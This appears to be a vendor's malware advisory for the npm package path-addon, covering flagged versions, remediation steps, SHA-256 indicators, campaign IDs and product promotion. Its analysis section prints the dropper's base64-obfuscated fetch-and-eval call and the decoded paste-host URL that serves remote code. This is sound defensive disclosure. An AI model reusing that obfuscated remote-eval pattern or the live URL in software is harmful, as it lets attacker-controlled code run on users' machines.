Which versions of path-addon are malicious?

The following npm versions of path-addon are flagged malicious: 1.0.4, 1.0.5, 1.0.6, 1.0.7. Treat any of these as compromised.

How do I remediate path-addon if I installed it?

path-addon establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.

I already installed path-addon — how do I know if it already compromised me?

If path-addon was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is path-addon part of a known attack campaign?

Yes — path-addon is associated with the IN-MAL-2026-004708, IN-MAL-2026-004707, IN-MAL-2026-004721, IN-MAL-2026-004722, IN-MAL-2026-004935, IN-MAL-2026-004934 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find path-addon across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for path-addon (4 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging path-addon across your stack and pipelines.

Malicious package

path-addonnpm

Malicious code in path-addon (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-3311

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall path-addon

What this malware does

path-addon impersonates the Node.js core path module (package name path-addon, README claims to be 'an exact copy of the NodeJS path module'). The body of path.js is the genuine Joyent path implementation, but a remote-code-execution dropper has been inserted: on require(), the module calls fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9SRlc2SQ==")) — which decodes to https://www.jsonkeeper.com/b/RFW6I, an anonymous mutable JSON paste host — then reads the response's content field and passes it to eval(). The destination URL is base64-encoded specifically to evade casual review and string-based scanners. Any process that imports path-addon executes whatever JavaScript the attacker has placed at that paste URL at the moment of require(), with no integrity check, no pinning, and no version constraint. The combined shape (typosquat name + trojanized legitimate source + obfuscated fetch + eval of remote content at module load) is unambiguous attacker tooling.

The OpenSSF Package Analysis project identified 'path-addon' @ 1.0.4 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Malicious versions

4 flagged

1.0.41.0.51.0.61.0.7

Indicators of compromise (SHA-256)

4aac3da4c776f814c79af215bfde0f1ee2c3db50e9b18997447f28e9d04df88a

1f1ee3f4c05bbe24c4113835e304dd3ee650c0a9eee8a4d62046283612827742

841010d222011fd6020bd7fc04307bbf20506c3fa1837fb14c4ec50996458a76

dd3198bde6aa2ea1b04043cb0a16d831667118334a13c759c7097261933457a1

0e17241453cc8d0c8c3ce06b18aa75eaca0799c9af55e08d406e2c5fed41a695

11d09848fb828ae851ef7b905f793e3b5876ee2a5ef4b4f8bf06d631ea904d78

4d7ce32d8902775c2d8d86acb27650f28f454f623487504019f5ee4388f0c8ac

44f7119799063ff81af4ca2879278aa26f2e56e23a601ef632a65f97d67a0451

ba1a7df799b6bd11bd036f1cfb1de6b1dfe0e4e72082be1b8a60537a59e5ae58

Detection & response playbook

Backdoor / remote access

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for path-addon (4 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging path-addon across your stack and pipelines.
If you installed it — respond
path-addon establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.
Did it already run?
If path-addon was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks path-addon before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. path-addon on npm has been identified as a malicious package (versions 1.0.4, 1.0.5, 1.0.6, 1.0.7 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004708IN-MAL-2026-004707IN-MAL-2026-004721IN-MAL-2026-004722IN-MAL-2026-004935IN-MAL-2026-004934

References

Credits

Amazon Inspector · finder
OpenSSF: Package Analysis · finder

Detect & block this

O3 blocks path-addon-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the C2 callback and severs the channel.

Malware detection Runtime egress monitoring